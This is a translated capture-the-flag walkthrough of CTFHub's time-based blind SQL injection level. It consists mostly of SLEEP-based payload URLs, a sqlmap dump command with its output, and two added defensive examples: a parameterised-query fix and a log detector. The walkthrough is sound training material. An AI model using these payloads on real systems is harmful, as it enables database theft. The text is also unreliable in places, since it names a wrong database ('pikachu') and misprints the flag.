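CTFHub SQL Injection Walkthrough Notes 5: Time-Based Blind Injection (Manual Method + Scripted Method)
Contents
I. Time-Based Blind Injection
II. Probing for SQL Injection
1. Open the target range
2. Enter 1 to probe the SQL injection type
3. Probe the injection method
4. Probe for SQL injection risk
III. Manual SQL Injection
1. Probe the database name
2. Probe the table names
3. Probe the column names
4. Probe the data
IV. Scripted Method with sqlmap
This article walks through the CTFHub platform's SQL time-based blind injection level. Entering test characters first confirms a numeric SQL injection. Because the page gives no feedback, time-based blind injection is used, with the SLEEP function combined with an IF conditional to infer database information. The manual injection stage obtains, step by step, the database name (sqli), the table names (news and flag), the column name (flag) and finally the flag value. The article also shows how to complete the test automatically with the sqlmap tool, specifying the time-based blind technique with the --tech T parameter and obtaining the same result. The whole process illustrates the technical characteristics and execution flow of time-based blind injection.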
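I. Time-Based Blind Injection
Time-based blind injection is an advanced SQL injection technique used when an application is injectable but neither displays query results nor returns obvious error messages. The attacker injects a malicious query containing a time-delay function (such as SLEEP() or BENCHMARK()) and judges whether the injected condition holds from the difference in page response time. If the condition is true, the database executes the delay function and the response takes noticeably longer; if it is false, the query returns immediately and the response time is normal. The technique does not depend on any visible output or error message and extracts data purely by measuring response time. It is slow but very stealthy and can bypass most traditional security defenses. The differences between boolean-based and time-based blind injection are shown in the table below.
Feature | Boolean-based blind | Time-based blind |
---|---|---|
Detection basis | Differences in page content | Differences in response time |
Core functions | Conditional functions | Delay functions |
Typical payload | AND 1=1 / AND 1=2 | AND SLEEP(5) |
How the result is judged | Inspect the displayed page content | Measure the response time |
Attack speed | Relatively fast | Relatively slow |
Stealth | Lower (leaves request traces) | Higher (resembles normal requests) |
Applicable scenario | Page content changes with the condition | Page does not change at all but injection exists |
Technical difficulty | Simple | More complex |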
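II. Probing for SQL Injection
1. Open the target range
Open the level ("SQL Injection - Time-Based Blind") and click to open the challenge, as shown below. The system automatically creates a Docker environment; the URL highlighted in blue in the figure below is the target environment.
Enter the target URL in the browser; this is our attack target. After the URL is visited, the page content clearly states "SQL time injection", as shown below.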
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800/
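2. Enter 1 to probe the SQL injection type
Following the hint, enter 1 on the page. The URL parameter becomes /?id=1, so id is presumably the injection point.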
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800/?id=1
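Look at the SQL statement echoed in the figure below: the parameter 1 is passed in without being wrapped in quotes, so this is indeed a numeric injection. The query succeeds, but the page shows no content and does not report that the query succeeded. Because the page does not output the query result and exposes no database information, UNION-based injection cannot be used.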
select * from news where id=1
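The fact that the parameter is not wrapped in quotes matters for the fix as well. The following is an added example, not code from the original post or from the challenge: it uses an in-memory SQLite table as a constructed stand-in for news (all function names are hypothetical) and shows that quote escaping leaves a numeric parameter injectable, while integer validation plus a bound parameter does not.

```python
import re
import sqlite3

def make_db():
    # Constructed stand-in for the challenge's `news` table (rows as in the sqlmap dump).
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE news (id INTEGER, data TEXT)")
    db.executemany("INSERT INTO news VALUES (?, ?)",
                   [(1, "ctfhub"), (2, "skill"), (114514, "sqli")])
    return db

def lookup_concat(db, raw_id):
    # Vulnerable: same shape as the query the page echoes back.
    return db.execute("select * from news where id=" + raw_id).fetchall()

def lookup_escaped(db, raw_id):
    # Incomplete fix: doubling quotes is irrelevant when the value sits in a
    # numeric context, because no quote is needed to add SQL after the number.
    escaped = raw_id.replace("'", "''")
    return db.execute("select * from news where id=" + escaped).fetchall()

def lookup_bound(db, raw_id):
    # Hardened: accept only ASCII digits, then pass the value as a bound parameter
    # so it can never be parsed as SQL text.
    if not re.fullmatch(r"[0-9]{1,18}", raw_id):
        raise ValueError("id must be a non-negative integer")
    return db.execute("select * from news where id=?", (int(raw_id),)).fetchall()

def demo():
    db = make_db()
    probe = "1 AND 1=2"  # boolean probe from the comparison table above
    out = {
        "concat_normal": lookup_concat(db, "1"),
        "concat_probe": lookup_concat(db, probe),    # row vanishes: input became SQL
        "escaped_probe": lookup_escaped(db, probe),  # still vanishes
    }
    try:
        out["bound_probe"] = lookup_bound(db, probe)
    except ValueError as exc:
        out["bound_probe"] = "rejected: " + str(exc)
    out["bound_normal"] = lookup_bound(db, "1")
    return out

if __name__ == "__main__":
    for name, value in demo().items():
        print(name, value)
```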
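3. Probe the injection method
Enter 1'. Since this level is a numeric injection, this tries to trigger an error by introducing a special character; if the page returned a detailed database error message, that would prove an SQL injection risk exists and that errors are not suppressed. As shown below, the page shows no database error message; apart from the SQL statement there is no output at all, so error-based injection cannot be used.
Next, enter a nonexistent id (-1) and observe whether the page outputs anything. As shown below, apart from the SQL statement the page again outputs nothing. Since the page outputs nothing whether the query succeeds or fails, time-based injection is needed.
4. Probe for SQL injection risk
Use 1 AND IF(LENGTH(DATABASE()) >0, SLEEP(2), 1) to test whether the length of the database name is greater than 0; this is an always-true statement, as shown below. The core principle is to use the IF conditional function and the SLEEP function for a time-delay test: when the database name length is greater than 0, SLEEP(2) runs and produces a 2-second delay; otherwise 1 is returned immediately.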
1 AND IF(LENGTH(DATABASE()) >0, SLEEP(2), 1)#mooyuan
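Right-click > Inspect Element > Network, enter the payload in the text box, then click search, as shown below.
The attacker judges whether the condition is true or false by observing the page response time: a noticeable delay means the database name length is indeed greater than 0. This method does not depend on what the page displays; it infers database information from differences in response time. Click the request, then click the timing entry at the lower right. As shown below, the response time exceeds 2000 ms (2 seconds), which means the sleep statement executed and the if condition held, so a time-based SQL injection risk exists.
III. Manual SQL Injection
1. Probe the database name
As shown below, the database name has length 4 and is sqli. The complete payloads that succeeded in the manual injection are as follows.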
[+] 第一步:探测数据库名
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(LENGTH(DATABASE()) = 4, SLEEP(2), 1)#mooyuan
数据库名长度:4
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(SUBSTRING(DATABASE(), 1, 1) = 's', SLEEP(2), 1)#mooyuan
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(SUBSTRING(DATABASE(), 2, 1) = 'q', SLEEP(2), 1)#mooyuan
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(SUBSTRING(DATABASE(), 3, 1) = 'l', SLEEP(2), 1)#mooyuan
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(SUBSTRING(DATABASE(), 4, 1) = 'i', SLEEP(2), 1)#mooyuan
数据库名:sqli
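2. Probe the table names
As shown below, the pikachu database has 2 tables, news and flag. The complete payloads that succeeded in the manual injection are as follows.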
[+] 第二步:探测表信息
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF((SELECT COUNT(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='sqli') = 2, SLEEP(2), 1)#mooyuan
表数量:2
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(LENGTH((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='sqli' LIMIT 0,1)) = 4, SLEEP(2), 1)#mooyuan
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='sqli' LIMIT 0,1), 1, 1) = 'n', SLEEP(2), 1)#mooyuan
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='sqli' LIMIT 0,1), 2, 1) = 'e', SLEEP(2), 1)#mooyuan
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='sqli' LIMIT 0,1), 3, 1) = 'w', SLEEP(2), 1)#mooyuan
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='sqli' LIMIT 0,1), 4, 1) = 's', SLEEP(2), 1)#mooyuan
表 1: news
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(LENGTH((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='sqli' LIMIT 1,1)) = 4, SLEEP(2), 1)#mooyuan
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='sqli' LIMIT 1,1), 1, 1) = 'f', SLEEP(2), 1)#mooyuan
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='sqli' LIMIT 1,1), 2, 1) = 'l', SLEEP(2), 1)#mooyuan
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='sqli' LIMIT 1,1), 3, 1) = 'a', SLEEP(2), 1)#mooyuan
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='sqli' LIMIT 1,1), 4, 1) = 'g', SLEEP(2), 1)#mooyuan
表 2: flag
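3. Probe the column names
As shown below, the flag table has 1 column, named flag. The complete payloads that succeeded in the manual injection are as follows.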
[+] 第三步:探测表 flag 的列
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF((SELECT COUNT(COLUMN_NAME) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='sqli' AND TABLE_NAME='flag') = 1, SLEEP(2), 1)#mooyuan
列数量:1
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(LENGTH((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='sqli' AND TABLE_NAME='flag' LIMIT 0,1)) = 4, SLEEP(2), 1)#mooyuan
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(SUBSTRING((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='sqli' AND TABLE_NAME='flag' LIMIT 0,1), 1, 1) = 'f', SLEEP(2), 1)#mooyuan
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(SUBSTRING((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='sqli' AND TABLE_NAME='flag' LIMIT 0,1), 2, 1) = 'l', SLEEP(2), 1)#mooyuan
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(SUBSTRING((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='sqli' AND TABLE_NAME='flag' LIMIT 0,1), 3, 1) = 'a', SLEEP(2), 1)#mooyuan
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(SUBSTRING((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='sqli' AND TABLE_NAME='flag' LIMIT 0,1), 4, 1) = 'g', SLEEP(2), 1)#mooyuan
列 1: flag
4. Probe the data
Next, probe the first row of the flag table; the flag value ctfhub{349a5528e5e9f96d31f93a56} is obtained successfully, as shown below.
[+] 从表 flag 提取数据
[*] 第 1 行数据:
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(LENGTH((SELECT flag FROM flag LIMIT 0,1)) = 32, SLEEP(2), 1)#mooyuan
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(SUBSTRING((SELECT flag FROM flag LIMIT 0,1), 1, 1) = 'c', SLEEP(2), 1)#mooyuan
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(SUBSTRING((SELECT flag FROM flag LIMIT 0,1), 2, 1) = 't', SLEEP(2), 1)#mooyuan
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(SUBSTRING((SELECT flag FROM flag LIMIT 0,1), 3, 1) = 'f', SLEEP(2), 1)#mooyuan
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(SUBSTRING((SELECT flag FROM flag LIMIT 0,1), 4, 1) = 'h', SLEEP(2), 1)#mooyuan
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(SUBSTRING((SELECT flag FROM flag LIMIT 0,1), 5, 1) = 'u', SLEEP(2), 1)#mooyuan
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(SUBSTRING((SELECT flag FROM flag LIMIT 0,1), 6, 1) = 'b', SLEEP(2), 1)#mooyuan
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(SUBSTRING((SELECT flag FROM flag LIMIT 0,1), 7, 1) = '{', SLEEP(2), 1)#mooyuan
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(SUBSTRING((SELECT flag FROM flag LIMIT 0,1), 8, 1) = '3', SLEEP(2), 1)#mooyuan
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(SUBSTRING((SELECT flag FROM flag LIMIT 0,1), 9, 1) = '4', SLEEP(2), 1)#mooyuan
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(SUBSTRING((SELECT flag FROM flag LIMIT 0,1), 10, 1) = '9', SLEEP(2), 1)#mooyuan
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(SUBSTRING((SELECT flag FROM flag LIMIT 0,1), 11, 1) = 'a', SLEEP(2), 1)#mooyuan
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(SUBSTRING((SELECT flag FROM flag LIMIT 0,1), 12, 1) = '5', SLEEP(2), 1)#mooyuan
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(SUBSTRING((SELECT flag FROM flag LIMIT 0,1), 13, 1) = '5', SLEEP(2), 1)#mooyuan
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(SUBSTRING((SELECT flag FROM flag LIMIT 0,1), 14, 1) = '2', SLEEP(2), 1)#mooyuan
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(SUBSTRING((SELECT flag FROM flag LIMIT 0,1), 15, 1) = '8', SLEEP(2), 1)#mooyuan
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(SUBSTRING((SELECT flag FROM flag LIMIT 0,1), 16, 1) = 'e', SLEEP(2), 1)#mooyuan
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(SUBSTRING((SELECT flag FROM flag LIMIT 0,1), 17, 1) = '5', SLEEP(2), 1)#mooyuan
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(SUBSTRING((SELECT flag FROM flag LIMIT 0,1), 18, 1) = 'e', SLEEP(2), 1)#mooyuan
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(SUBSTRING((SELECT flag FROM flag LIMIT 0,1), 19, 1) = '9', SLEEP(2), 1)#mooyuan
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(SUBSTRING((SELECT flag FROM flag LIMIT 0,1), 20, 1) = 'f', SLEEP(2), 1)#mooyuan
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(SUBSTRING((SELECT flag FROM flag LIMIT 0,1), 21, 1) = '9', SLEEP(2), 1)#mooyuan
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(SUBSTRING((SELECT flag FROM flag LIMIT 0,1), 22, 1) = '6', SLEEP(2), 1)#mooyuan
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(SUBSTRING((SELECT flag FROM flag LIMIT 0,1), 23, 1) = 'd', SLEEP(2), 1)#mooyuan
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(SUBSTRING((SELECT flag FROM flag LIMIT 0,1), 24, 1) = '3', SLEEP(2), 1)#mooyuan
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(SUBSTRING((SELECT flag FROM flag LIMIT 0,1), 25, 1) = '1', SLEEP(2), 1)#mooyuan
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(SUBSTRING((SELECT flag FROM flag LIMIT 0,1), 26, 1) = 'f', SLEEP(2), 1)#mooyuan
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(SUBSTRING((SELECT flag FROM flag LIMIT 0,1), 27, 1) = '9', SLEEP(2), 1)#mooyuan
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(SUBSTRING((SELECT flag FROM flag LIMIT 0,1), 28, 1) = '3', SLEEP(2), 1)#mooyuan
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(SUBSTRING((SELECT flag FROM flag LIMIT 0,1), 29, 1) = 'a', SLEEP(2), 1)#mooyuan
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(SUBSTRING((SELECT flag FROM flag LIMIT 0,1), 30, 1) = '5', SLEEP(2), 1)#mooyuan
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(SUBSTRING((SELECT flag FROM flag LIMIT 0,1), 31, 1) = '6', SLEEP(2), 1)#mooyuan
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(SUBSTRING((SELECT flag FROM flag LIMIT 0,1), 32, 1) = '}', SLEEP(2), 1)#mooyuan
flag: ctfhuB{349a5528e5e9f96d31f93a56}
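Seen from the server side, the manual probing above leaves a recognisable trail: many requests from one client that carry a delay function, a SUBSTRING position that climbs, and response times that match the requested SLEEP. The following is an added example, not part of the original post, that flags this pattern in access logs; the log layout (combined style with the request time in seconds as the last field), the sample lines and the client addresses are constructed assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import quote, unquote_plus

# Assumed log layout: combined-style line, request time in seconds as the last field.
LINE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) [^"]*" (\d{3}) \d+ ([\d.]+)$')
# SLEEP(n) captures n; BENCHMARK( is matched but has no seconds to compare against.
DELAY = re.compile(r"\bsleep\s*\(\s*(\d+(?:\.\d+)?)\s*\)|\bbenchmark\s*\(", re.I)
# SUBSTRING(expr, pos, 1): a climbing pos means character-by-character extraction.
POS = re.compile(r"\bsubstr(?:ing)?\s*\(.*?,\s*(\d+)\s*,\s*1\s*\)", re.I)

def _line(ip, payload, status, secs):
    return (f'{ip} - - [14/Sep/2025:10:40:00 +0000] '
            f'"GET /?id={quote(payload)} HTTP/1.1" {status} 512 {secs:.3f}')

# Constructed sample traffic (documentation IP ranges), not captured from the target.
SAMPLE_LOG = "\n".join([
    _line("203.0.113.7", "1", 200, 0.004),
    _line("203.0.113.7", "1 AND IF(LENGTH(DATABASE()) = 4, SLEEP(2), 1)", 200, 2.006),
    _line("203.0.113.7", "1 AND IF(SUBSTRING(DATABASE(), 1, 1) = 'a', SLEEP(2), 1)", 200, 0.005),
    _line("203.0.113.7", "1 AND IF(SUBSTRING(DATABASE(), 1, 1) = 's', SLEEP(2), 1)", 200, 2.004),
    _line("203.0.113.7", "1 AND IF(SUBSTRING(DATABASE(), 2, 1) = 'q', SLEEP(2), 1)", 200, 2.005),
    _line("198.51.100.20", "2", 200, 0.003),
    _line("198.51.100.9", "1 AND SLEEP(5)", 403, 0.002),
])

def analyze(log_text):
    """Per client: delay payloads seen, how many actually stalled, positions probed."""
    stats = defaultdict(lambda: {"payloads": 0, "delayed": 0, "positions": set()})
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        ip, target, elapsed = m.group(1), m.group(2), float(m.group(4))
        query = unquote_plus(target.partition("?")[2])
        hit = DELAY.search(query)
        if not hit:
            continue
        s = stats[ip]
        s["payloads"] += 1
        # A response at least as slow as the requested SLEEP means the database ran it.
        if hit.group(1) and elapsed >= float(hit.group(1)):
            s["delayed"] += 1
        s["positions"].update(int(p) for p in POS.findall(query))
    for s in stats.values():
        s["verdict"] = "injection executing" if s["delayed"] else "probing only"
    return dict(stats)

if __name__ == "__main__":
    for ip, s in analyze(SAMPLE_LOG).items():
        print(ip, s["verdict"], s["payloads"], s["delayed"], sorted(s["positions"]))
```

The verdict separates a client whose payloads were rejected or never reached the database from one whose delays are visible in the server's own timings, which is the case that needs a code fix rather than only a block rule.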
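IV. Scripted Method with sqlmap
We use sqlmap for the test. The parameters mean: get the current database name (--current-db) and dump all data (--dump), running fully automatically with no manual interaction (--batch). The complete SQL injection command is as follows.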
sqlmap -u http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800/?id=1 --current-db --dump --batch --tech T
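- --current-db: an information-enumeration parameter. It tells sqlmap, once an injection point has been found, to first obtain the name of the database currently in use. This is the key first step for what follows, because the tables inside a database can only be queried once its name is known.
- --dump: a data-extraction parameter and the "ultimate goal" of this command. It tells sqlmap to make every effort to extract and download all the data it can access. The behaviour of --dump is very aggressive and automated, and it usually includes the following sub-steps:
  - Enumerate all table names in the current database.
  - For each table, enumerate all of its column names.
  - Then extract all data in each table (every row and every column) and save it locally.
- --batch: run in non-interactive mode, automatically choosing the default options with no manual intervention.
- --tech T: set the SQL injection testing technique to time-based blind (Time-based blind SQL injection). This technique builds SQL statements containing a delay function and judges whether the injection succeeded from differences in page response time; it suits scenarios where the injection result cannot be judged directly from the page content.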
As shown below, sqlmap succeeds and obtains the flag value ctfhub{349a5528e5e9f96d31f93a56}. Because the output is long, only the key information is shown here.
┌──(kali㉿kali)-[~]
└─$ sqlmap -u http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800/?id=1 --current-db --dump --batch --tech T
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.6#stable}
|_ -| . [)]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 10:44:43 /2025-09-14/
[10:44:43] [INFO] resuming back-end DBMS 'mysql'
[10:44:43] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1 AND (SELECT 3536 FROM (SELECT(SLEEP(5)))LwKS)
---
[10:44:43] [INFO] the back-end DBMS is MySQL
web application technology: OpenResty 1.21.4.2, PHP 7.3.14
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[10:44:43] [INFO] fetching current database
[10:44:43] [INFO] resumed: sqli
current database: 'sqli'
[10:44:43] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[10:44:43] [INFO] fetching current database
[10:44:43] [INFO] fetching tables for database: 'sqli'
[10:44:43] [INFO] fetching number of tables for database 'sqli'
[10:44:43] [INFO] resumed: 2
[10:44:43] [INFO] resumed: news
[10:44:43] [INFO] resumed: flag
[10:44:43] [INFO] fetching columns for table 'news' in database 'sqli'
[10:44:43] [INFO] resumed: 2
[10:44:43] [INFO] resumed: id
[10:44:43] [INFO] resumed: data
[10:44:43] [INFO] fetching entries for table 'news' in database 'sqli'
[10:44:43] [INFO] fetching number of entries for table 'news' in database 'sqli'
[10:44:43] [INFO] resumed: 3
[10:44:43] [INFO] resumed: ctfhub
[10:44:43] [INFO] resumed: 1
[10:44:43] [INFO] resumed: skill
[10:44:43] [INFO] resumed: 2
[10:44:43] [INFO] resumed: sqli
[10:44:43] [INFO] resumed: 114514
Database: sqli
Table: news
[3 entries]
+--------+--------+
| id     | data   |
+--------+--------+
| 1      | ctfhub |
| 2      | skill  |
| 114514 | sqli   |
+--------+--------+
[10:44:43] [INFO] table 'sqli.news' dumped to CSV file '/home/kali/.local/share/sqlmap/output/challenge-f283d7e9d400a865.sandbox.ctfhub.com/dump/sqli/news.csv'
[10:44:43] [INFO] fetching columns for table 'flag' in database 'sqli'
[10:44:43] [INFO] resumed: 1
[10:44:43] [INFO] resumed: flag
[10:44:43] [INFO] fetching entries for table 'flag' in database 'sqli'
[10:44:43] [INFO] fetching number of entries for table 'flag' in database 'sqli'
[10:44:43] [INFO] resumed: 1
[10:44:43] [INFO] resumed: ctfhub{349a5528e5e9f96d31f93a56}
Database: sqli
Table: flag
[1 entry]
+----------------------------------+
| flag                             |
+----------------------------------+
| ctfhub{349a5528e5e9f96d31f93a56} |
+----------------------------------+
[10:44:43] [INFO] table 'sqli.flag' dumped to CSV file '/home/kali/.local/share/sqlmap/output/challenge-f283d7e9d400a865.sandbox.ctfhub.com/dump/sqli/flag.csv'
[10:44:43] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/challenge-f283d7e9d400a865.sandbox.ctfhub.com'
[10:44:43] [WARNING] your sqlmap version is outdated
[*] ending @ 10:44:43 /2025-09-14/